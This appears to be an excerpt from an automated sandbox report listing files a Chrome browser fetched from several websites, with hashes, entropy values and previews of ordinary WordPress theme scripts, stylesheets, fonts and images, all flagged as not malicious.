                                                                                                                                              Preview:......Exif..II*...........................k...................................................................................................(...........1...........2...........;.......&...i.......8.............Canon.Canon EOS 6D Mark II...-..'....-..'..Adobe Photoshop CC (Macintosh).2019:09:11 12:13:45.Mariano Romani.... ........................."...........'...........0...........2...................0230....................................................................................................................00..........00......................_...........k.......................&...............................................................1...........2.......;...4.......[...5.......s...............G.......2019:06:25 10:28:57.2019:06:25 10:28:57..Qr.@B..VLV.@B..................&........Ud......Ud.....053051007305.........F.......................EF24-70mm f/2.8L II USM.6075004335.........................................(.......................................H.......H.....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 75 x 74, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):28207
                                                                                                                                              Entropy (8bit):5.4008387140017
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:/JN9NvO3tT508SkWARqtMJEOJaFekr3jhVe5Wz:BN9Nv4t2hkP6OwZ3jhh
                                                                                                                                              MD5:E6B2EFBE08AD337A88FC61DB5A933523
                                                                                                                                              SHA1:5DCA2862DD84D3F699EBC0DB5123A1852D2752CB
                                                                                                                                              SHA-256:9D212738DCE90AC9B477D86929CA0FA08B4453EB7AB9868E24040B3200612A29
                                                                                                                                              SHA-512:D1B67DEC88C1EA0C71567849EC9C2106C34831AE24D8C2B16A8F6E83F361B64A5BDDE62EFBCAC71198CE7F12EA5AAA47A85B4EFAE4CC9178A5391617064BD8F1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...K...J.....|p>.....pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2996
                                                                                                                                              Entropy (8bit):4.0773068909292185
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:sWGjgI1GYYv+IGL63IevoyiO/b2g1vnKBFF9j:sWGjRGYYvXGcRQyiO/Sg1vnK7Tj
                                                                                                                                              MD5:B55E7C1D322D644E1644496EF0D8C7C3
                                                                                                                                              SHA1:D3F2DC4D08D81D3769498396C91737AF12735FEA
                                                                                                                                              SHA-256:D000CBDC4EAF4968F59DB635892E36BDE66D1563CA301F5AD52A5791FB9CECB3
                                                                                                                                              SHA-512:E298A029E8F3EDEFCCCDC0B40D958B5BC82D9F96B1CA89E01EE821017E6D7B015C9D9333C3A11ECE5E6B6EC4961304B9418156BB5A3A8CA0EBD1728D092909EB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Message Box.// -------------------------------------------------------------------------------------------..(function($).{. "use strict";.. $.fn.avia_sc_messagebox = function (options) {.. "use strict";.. return this.each(function () {.. var container = $(this),. close_btn = container.find('.av_message_close'),. mbox_ID = container.attr('id'),.. aviaSetCookie = function(CookieName,CookieValue,CookieDays) {. if (CookieDays) {. var date = new Date();. date.setTime(date.getTime()+(CookieDays*24*60*60*1000));. var expires = "; expires="+date.toGMTString();. }. else var expires = "";. document.cookie = CookieName+"="+CookieValue+expires+"; path=/";. },..
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5081
                                                                                                                                              Entropy (8bit):4.872155066547225
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:Z75kJMEEWSH4zC1t3+bMkNG5jOOhZ9rU4prcV2fGURJf8:KAH4zC1U/NG5jO4Zi4prZf8
                                                                                                                                              MD5:8284F1A53A88616626271EA58FF8700C
                                                                                                                                              SHA1:3351D77F4D01733C00A5C2F7ECC89C571D3E36A8
                                                                                                                                              SHA-256:46E51E0E7D593FD1EA59775973395AF361FA164473C0E1CE8CF606A0CC684C60
                                                                                                                                              SHA-512:5B8A93A31C55BA7941BE152D58DD5537F9716574266A9B5FA3B34440387E35AB4B2B111B4D7C659B5258DD919C2EAB73A0DCC5744DE03A7865D0B80347B7191B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Horizontal Gallery.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";...$.fn.avia_hor_gallery= function(options)..{...var defaults =....{.....slide_container.: '.av-horizontal-gallery-inner', //element with max width.....slide_element.: '.av-horizontal-gallery-slider', //element that gets moved.....slide_content.: '.av-horizontal-gallery-wrap',.....active...: 'av-active-gal-item',....// must be a class string without the . in front.....prev...: '.av-horizontal-gallery-prev',.....next...: '.av-horizontal-gallery-next'....};.....var options = $.extend(defaults, options);......var win ...= $(window),....browserPrefix .= $.avia_utilities.supports('transition'),....cssActive ..= this.browserPrefix !== false ? true : false,....isMobile ..= $.avia_utilities.isMobile,....transform3d..= document.documentElement.className.in
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65532), with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):163165
                                                                                                                                              Entropy (8bit):4.799932651979088
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:0gw1y/Z2/kUv70ji8RtT78zaW+u833rG4wMvba:0gw1y/ZckUv72i8RtH8zaWN833rdwMve
                                                                                                                                              MD5:04C1C0A8BA76C5295210AE13AB7F64B9
                                                                                                                                              SHA1:F1C25B3DCD52A655EED12FFB5AF6608BFF40E17A
                                                                                                                                              SHA-256:35E773C7020F6D92A171153965F798EBFC775EDABD5C9F17A62E8DE2EBB1DE13
                                                                                                                                              SHA-512:5B2C6B433402F4679525C9645933838E60F24F8EBB623E315248FCF6D7BE1E396ABDA6C23E88A9329A2736202385370BC70925E1558EB2FBFE701074BE82BE85
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/dynamic_avia/enfold.css?ver=6335ddf9ba942
                                                                                                                                              Preview:....::-moz-selection{background-color: #c99c66;color: #ffffff;}::selection{background-color: #c99c66;color: #ffffff;}html.html_boxed {background: #eeeeee top left no-repeat scroll;}.socket_color, .socket_color div, .socket_color header, .socket_color main, .socket_color aside, .socket_color footer, .socket_color article, .socket_color nav, .socket_color section, .socket_color span, .socket_color applet, .socket_color object, .socket_color iframe, .socket_color h1, .socket_color h2, .socket_color h3, .socket_color h4, .socket_color h5, .socket_color h6, .socket_color p, .socket_color blockquote, .socket_color pre, .socket_color a, .socket_color abbr, .socket_color acronym, .socket_color address, .socket_color big, .socket_color cite, .socket_color code, .socket_color del, .socket_color dfn, .socket_color em, .socket_color img, .socket_color ins, .socket_color kbd, .socket_color q, .socket_color s, .socket_color samp, .socket_color small, .socket_color strike, .socket_color strong,
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65345)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):93397
                                                                                                                                              Entropy (8bit):5.598966964748747
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:j5NOzTV33OArTrzZvcIQs/dHlxz/P1QvzUOxOLpkjsLe6eGm1lRBceiM689MCyVI:j5Y/ZvcIQs/dHlxzX1Qvz7xOLpzLe6eJ
                                                                                                                                              MD5:53F8192C7F9CBCE664860291885FAD0F
                                                                                                                                              SHA1:A125D873E513119A2AF686912120F22345DB818C
                                                                                                                                              SHA-256:D023162640CD0BD0DC531E8C7171B6AC34557A704A1B7ACAC6F86F512539030D
                                                                                                                                              SHA-512:02F5B5932463B19962B02D84D5AAF8F922F75E3317FDEF322247C746627F92B77999178F7AE766948A533B21A10CC1753A42BF7CF81B8BB8D757C16C0DADFB0F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/assets/css/magiczoomplus/magiczoomplus.js
                                                                                                                                              Preview:/*... Magic Zoom Plus v5.3.5 . Copyright 2020 Magic Toolbox. Buy a license: https://www.magictoolbox.com/magiczoomplus/. License agreement: https://www.magictoolbox.com/license/...*/.eval(function(m,a,g,i,c,k){c=function(e){return(e<a?'':c(parseInt(e/a)))+((e=e%a)>35?String.fromCharCode(e+29):e.toString(36))};if(!''.replace(/^/,String)){while(g--){k[c(g)]=i[g]||c(g)}i=[function(e){return k[e]}];c=function(){return'\\w+'};g=1};while(g--){if(i[g]){m=m.replace(new RegExp('\\b'+c(g)+'\\b','g'),i[g])}}return m}('1n.aL=(17(){1a B,q;B=q=(17(){1a W={4I:"je.3.5",eX:0,8F:{},$cp:17(aa){1b(aa.$6J||(aa.$6J=++Q.eX))},9Z:17(aa){1b(Q.8F[aa]||(Q.8F[aa]={}))},$F:17(){},$1k:17(){1b 1k},$1s:17(){1b 1s},fz:"dH-"+1q.4R(1q.6e()*1v cc().eS()),3C:17(aa){1b(2E!=aa)},cS:17(ab,aa){1b(2E!=ab)?ab:aa},aQ:17(aa){1b!!(aa)},1U:17(aa){if(!Q.3C(aa)){1b 1k}if(aa.$59){1b aa.$59}if(!!aa.6Q){if(1==aa.6Q){1b"6I"}if(3==aa.6Q){1b"fb"}}if(aa.1J&&aa.eM){1b"gx"}if(aa.1J&&aa.aR){1b"2h"}if((aa 41 1n.7f||aa 41 1n.bo)&&aa.5x==
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2497
                                                                                                                                              Entropy (8bit):4.843621206511125
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:EB+VRkUlcs7bFfAeJLyfrlyQMMKXiFvJ+JemNpSDYi6R:EBeqyckbFoceJyQuX+hapSkrR
                                                                                                                                              MD5:A0B3B46931A88E9397C2E22AD93460AC
                                                                                                                                              SHA1:92169E8FA68C8EC06EB571EA4A89D22D5E604E70
                                                                                                                                              SHA-256:F3BE56D8AC58697106341FFE67BABAAFB18D3E6A2FAD673E9D4FE8347AB01195
                                                                                                                                              SHA-512:F657EF638F00648C94BA40D71597FF27064ADD39EB8B411C1266C7774A20B9DFA5C9566D0B8D3626D13526A2E8402A3A7E121D6A8525965C2244B0D1CF1A2744
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// Gallery shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_gallery = function(options)..{...return this.each(function()...{....var gallery = $(this), images = gallery.find('img'), big_prev = gallery.find('.avia-gallery-big');........//trigger displaying of thumbnails....gallery.on('avia_start_animation', function()....{.....images.each(function(i).....{......var image = $(this);......setTimeout(function(){ image.addClass('avia_start_animation') }, (i * 110));.....});....});........if(gallery.hasClass('deactivate_avia_lazyload')) gallery.trigger('avia_start_animation');......//trigger thumbnail hover and big prev image change....if(big_prev.length)....{.....gallery.on('mouseenter','.avia-gallery-thumb a', function().....{......var _self = this;........big_prev.attr('data-oncl
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):7813
                                                                                                                                              Entropy (8bit):4.843759246435122
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:hXgeYzGBIPrEuG9LSWb91BXitptrYGS3M6:hgeYzMgRG9dEtriM6
                                                                                                                                              MD5:9E8F00CF421DFC22847BC5D22834B45E
                                                                                                                                              SHA1:ADF8D36362B5313B3BEDDF5642109DDB8E5BBB09
                                                                                                                                              SHA-256:E57EC9E9ED2249AA9614B2782F4D435EB10116B001D94BD83B99FD83BBA18B08
                                                                                                                                              SHA-512:B792A12B8160BADA54D0264F16DB2B0DC3BFFF663C1D77E69B7E692B9E78B8FDDE507BD7D757CD918F6B21FBE2B8AD3C71FF2D13F824E740E977D15AABB7D9C0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// contact form ajax.// -------------------------------------------------------------------------------------------..(function($).{..$.fn.avia_ajax_form = function(variables)..{....var defaults =...{....sendPath: 'send.php',....responseContainer: '.ajaxresponse'...};....var options = $.extend(defaults, variables);....return this.each(function()...{....var form = $(this),.....form_sent = false,.....send =.....{......formElements: form.find('textarea, select, input[type=text], input[type=checkbox], input[type=hidden]'),......validationError:false,......button : form.find('input:submit'),......dataObj : {}.....},......responseContainer = form.next(options.responseContainer+":eq(0)");......send.button.on('click', checkElements);...............//change type of email forms on mobile so the e-mail keyboard with @ sign is used.....if($.avia_utilities.isMobile).....{......send.formElements.each(functi
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):839
                                                                                                                                              Entropy (8bit):5.350697172992779
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:3wXiOYs1ONntJc+u/rwXiOYs1OPwy96cGSSf7:gXiOL1KJc+uMXiOL1yN0xD
                                                                                                                                              MD5:C158E0344517DFF85C5ABA3B4E77A830
                                                                                                                                              SHA1:C1A482E1EBD7BEF96A4921F609A642BF797A3514
                                                                                                                                              SHA-256:06F13DADCB1ACFC7A0D2AD945507FFAC1A14454301FB0310E45AA943E73B6F2F
                                                                                                                                              SHA-512:C2374A7F2D8571536D55E8638F1DA38CF5C5474DF354A76A5C9141222F19A745F6FF8E1EBEC77C179D580E62D384CF2425290125A6E73B5C7CAB181B01B704E0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.googleapis.com/css?family=Terminal+Dosis
                                                                                                                                              Preview:/* latin-ext */.@font-face {. font-family: 'Terminal Dosis';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/terminaldosis/v20/BXRyvFbejejHgENDQMs-nhycKtDe9ZiOqA.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Terminal Dosis';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/terminaldosis/v20/BXRyvFbejejHgENDQMs-nhycKtDQ9Zg.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):44
                                                                                                                                              Entropy (8bit):4.414564153841
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:dhhYdCl+wdn:dcCIwd
                                                                                                                                              MD5:6767D52A2D854B02A7E0F1C8EDA40B72
                                                                                                                                              SHA1:BC5D1188179B08979FF780F06D1936A1C1232C8C
                                                                                                                                              SHA-256:809F5BDECB993FDD7499A175B7B53CEA8E7EA7C144DBC54C767A0E478F721B13
                                                                                                                                              SHA-512:9A50E1B4DAD25E729BBD0E8FB5E8160A965DAF983604A694205DE920C75258E9C8638B86BAA3F037A3453C5961AD3DE08367121D6DAA16B5E6087D44C8F7107D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwk9DXMY157geRIFDXOpIh4SBQ3Q7TdU?alt=proto
                                                                                                                                              Preview:Ch4KDQ1zqSIeGgQIWxgBIAEKDQ3Q7TdUGgQIXBgBIAE=
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 600 x 336, 8-bit colormap, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):23657
                                                                                                                                              Entropy (8bit):7.978555300365959
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:BXhfqNQ7nJCPa0/h8Q2JYAp73MaLpp1agGr8CP7LPtU6tobSKAJBbFQ4IRbh4nYb:3fqNIJS/h8PJ5p75pp88CzL6aJXxIwn4
                                                                                                                                              MD5:E1A7115B9E551D311CE3B93BA0712954
                                                                                                                                              SHA1:DBCD1AF288506EFED5B8C3EA8C5E13F1A703D3A8
                                                                                                                                              SHA-256:F7AAFD0DC467D9B83E237AD46167AB321A395FEDE6E2B263927B4EB57255C404
                                                                                                                                              SHA-512:8A1AA5B5D70807F4C9181669FA51FE324B96C34ECA1F3894A8053917E58747B66632F0B45DFF9DFCE508A96AFF4CB7BC66613C4FEBE5A63E153F13AC39393DD1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://pienissimo.s3.eu-central-1.amazonaws.com/clientslogo/user_253_uzuypfb7d33r7lvcjvw37oharuqxwlgk.png
                                                                                                                                              Preview:.PNG........IHDR...X...P.....T.......PLTELiq{I(......@..zH'{I'{I(...pI2........}L,zG%}K+.W9.[=.O0.O/..~M-.P1.......R2.U6.U6....h.|f.nU.[>.jO.^A.^A..........aE.....v.t[.fK.mS...aD~L,....qX....eJ..{.zb..}..l.X;.T6.sZ.fJ..q.}f.pV....jO.zb.....m..w.......v.........h.jO._B.V7.za{I(}G%{H&{G%}I'yE"|H't......QtRNS..........8.........$..C....CI_{..S2$F.Qmk...../.c.].8z...R..y.&..b..u.P.............pHYs.........&.:4...;tEXtComment.xr:d:DAGB_vkJXXo:2,j:2165529927534471793,t:24041006.T.G.. .IDATx..].W....@.;.H".2....q@P.@...C.......QP.....Rk.{.=b.........-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.MQ.E.0.;E...../1.!.dy.eu........%....V........@`....).....`.B:...vw....l3.........p"i....~=_:...-m.d....E.0..D8..T*..i...L.$.PH..P$..f..D^.5jh.y.u....ME.Q.%..c..........=..ry...........Z.4f..4...R..m.....(ph...K.>..!.z...D.:..g..)..7..8..Q.V[/..
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):908
                                                                                                                                              Entropy (8bit):4.489980594331261
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2GuBkYApJDxUKBP2e2nTC4T2PL2kVr086L0MJu/b:GBnApJDxUcOegC1PCkVr08nl
                                                                                                                                              MD5:A5561B9480514546A73A09828A5C12EE
                                                                                                                                              SHA1:6DCD9D99F1EA1D794496B67E755EB40B918F9447
                                                                                                                                              SHA-256:4B4F3412D4FFA62F21545FA5CA2EFF90C4AC0B678B8A9D77786DF3EEC998D419
                                                                                                                                              SHA-512:7AD7384A4E819ABC94DC14136B3A4C969592E9BCF1418646D2129C6CA4B4E25231C8BD03CA5109B633E5C0330195AD618970453D17ECD2E23DBE97479EF7ED20
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// Progress bar shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_progressbar = function(options)..{...return this.each(function()...{....var container = $(this), elements = container.find('.avia-progress-bar');............//trigger displaying of progress bar....container.on('avia_start_animation', function()....{.....elements.each(function(i).....{......var element = $(this)............setTimeout(function()......{ .......element.find('.progress').addClass('avia_start_animation') .......element.find('.progressbar-percent').avia_sc_animated_number(.......{........instant_start:true, simple_up:true, start_timer: 10.......});.............}, (i * 250));.....});....});...});..}...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1454)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):32116
                                                                                                                                              Entropy (8bit):5.161022669749519
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:P4oRQ+OUO/b3AkNtyhzwHPiUzzfG3DfaflNIdbzXl:QtPJehz8iUz7OLIlNIdbzXl
                                                                                                                                              MD5:0143F8E75E46234B287872903F6A08D7
                                                                                                                                              SHA1:5C4D518FBA5E0FD5DF1A1314C0BCB78B23D4B848
                                                                                                                                              SHA-256:02EF0A00041B8134CD1DD844C9C4DB12ECBA392CD9204B592E61B6D8BF2E6707
                                                                                                                                              SHA-512:1A38D11836D1B10AFE4E99D6CD5C4C613AFFC6994A347D12518DAF6AE3458E1729E37457C13EC99989415D2263990477C149FDB54A865A4A058E22A2FF07AA28
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/css/shortcodes.css?ver=4.5
                                                                                                                                              Preview:/* ======================================================================================================================================================.GENERIC.====================================================================================================================================================== */...p:empty, .entry-content-wrapper:empty{display:none;}..avia-shadow{box-shadow:inset 0 1px 3px rgba(0, 0, 0, 0.1);}../*fix webkit flickering bug*/..webkit_fix{.-webkit-perspective: 1000px;.-webkit-backface-visibility: hidden;.}..body .container_wrap .avia-builder-el-no-sibling{margin-top:0; margin-bottom:0;}.body .container_wrap .avia-builder-el-last{margin-bottom:0;}.body .container_wrap .avia-builder-el-first{margin-top:0;}..body .av-align-left{text-align: left;}.body .av-align-right{text-align: right;}.body .av-align-center{text-align: center;}..#top .av_inherit_color *{color:inherit;}.#top .av_inherit_color a{text-decoration: underline; }..#top .av_opacity_variation{opaci
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2383
                                                                                                                                              Entropy (8bit):4.874826401844771
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ukLeB7wXBYJL+k9Wlw7gyhhY9NUT8CZeD1szDoHbQG/7iW/7fzAgzAJ/74Y8+gY1:EBYbko29hiufs68+V8F0
                                                                                                                                              MD5:3FD3074107D5C1C1C8F8E55467015D58
                                                                                                                                              SHA1:D22A279E2AB230F05C7B20FC3425CC1BA1C3E75C
                                                                                                                                              SHA-256:FEB5FDE28EE7423FDEC347BEF495D6DB66D2FA4C0CEA6D220BA6C14CDAB65435
                                                                                                                                              SHA-512:00833AB555C1752F73E1850903CA10ED7D222DA1A54966240DF04BACAC48A56314C1118D5749E68AEDF0F6946BC8EBE68DF2A5B012964EC8119DB8C58A716AAE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.AVIACCORDION.====================================================================================================================================================== */..#top .avia-accordion-slider-wrap{border:none; z-index: 2;}.#top .avia-accordion-slider-wrap.el_after_av_slideshow_accordion{ box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.4); }.#top .aviaccordion{position: relative; overflow: hidden;}.#top .aviaccordion-inner, #top .aviaccordion-slide, #top .aviaccordion-slide-link{position: absolute; margin:0; padding:0; width:100%; height:100%; list-style-type: none;}.#top .aviaccordion-slide img{ height:100%; position: absolute; display:block; opacity: 0; filter:alpha(opacity=0); }.#top .aviaccordion-slide{ box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.4); z-index: 2; overflow: hidden;}.#top .aviaccordion-preview{position: absolute; z-index: 10
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):225
                                                                                                                                              Entropy (8bit):4.949449059609909
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4JEqgRtuuHWs5uRtwi5uRtDICMq2:t438gf37ufZufsX/
                                                                                                                                              MD5:859F18A5ACFD4E8D702A9B3D539DFD2D
                                                                                                                                              SHA1:4B0135F6AEEEA3F5D3CF75A388928F2DA6D40DFD
                                                                                                                                              SHA-256:D601FCC2E5B1FD48B79D53C55108AF4C0E90793F146DB51F3EE449D8D69512BC
                                                                                                                                              SHA-512:A79B7D6D94E0942D2CD082B93C831A5E2BFEEED9C81D87B0B20CE01A8DF42D0B33900B7B0A88E84322F0411ADC85AC3D84A3CA581F1C3A4282E8F350493DB1E4
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/cz.5a24757d105fbe7a4e81.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-cz" viewBox="0 0 640 480">. <path fill="#fff" d="M0 0h640v240H0z"/>. <path fill="#d7141a" d="M0 240h640v240H0z"/>. <path fill="#11457e" d="M360 240 0 0v480z"/>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):34179
                                                                                                                                              Entropy (8bit):5.24378984580027
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:tjp/HdQu8hIrNjHunBoaaif2ditPu0I80qyGaagvZ8/8Lo+tn6J5jVt1PauAxlqa:tjp/HdQu8QNjHunqaHmZ8/8Lo+tnkjV8
                                                                                                                                              MD5:DFFA195B546CF1DFD52F2206955EB892
                                                                                                                                              SHA1:A3D48E8F126EB96D12191D76ED71AD2BC8651D59
                                                                                                                                              SHA-256:6C52384C7B0641DD1EAD85D079C22D39BCC6DC5F2537AFB1E6396BB619771A3F
                                                                                                                                              SHA-512:65F3B79475AED8029C10AE3770BCD0FEE4F089A967B86525A6B2C1F8AB6BBE687361C403F9B2C2CFC61322DF9AD8B1D70C0E650FC6CCDC4AD72EB5F65FB38B56
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:CLI_ACCEPT_COOKIE_NAME = (typeof CLI_ACCEPT_COOKIE_NAME !== 'undefined' ? CLI_ACCEPT_COOKIE_NAME : 'viewed_cookie_policy');.CLI_PREFERNCE_COOKIE = (typeof CLI_PREFERNCE_COOKIE !== 'undefined' ? CLI_PREFERNCE_COOKIE : 'CookieLawInfoConsent');.CLI_ACCEPT_COOKIE_EXPIRE = (typeof CLI_ACCEPT_COOKIE_EXPIRE !== 'undefined' ? CLI_ACCEPT_COOKIE_EXPIRE : 365);.CLI_COOKIEBAR_AS_POPUP = (typeof CLI_COOKIEBAR_AS_POPUP !== 'undefined' ? CLI_COOKIEBAR_AS_POPUP : false);.var CLI_Cookie = {..set: function (name, value, days) {...var secure = "";...if (true === Boolean(Cli_Data.secure_cookies)) {....secure = ";secure";...}...if (days) {....var date = new Date();....date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));....var expires = "; expires=" + date.toGMTString();...} else {....var expires = "";...}...document.cookie = name + "=" + value + secure + expires + "; path=/";...if (days < 1) {....host_name = window.location.hostname;....document.cookie = name + "=" + value + expires + "; path=/; d
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (494)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):10401
                                                                                                                                              Entropy (8bit):5.018950165548087
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:ONNYwVxbXhNe3zMSpiqFNd3H8qBOGCOJ7:wuBbZ7
                                                                                                                                              MD5:68B3FE350B37AF335B1CA63B7D178885
                                                                                                                                              SHA1:F6BC2BF2D30F902B883165E4DEDC09CDF5205903
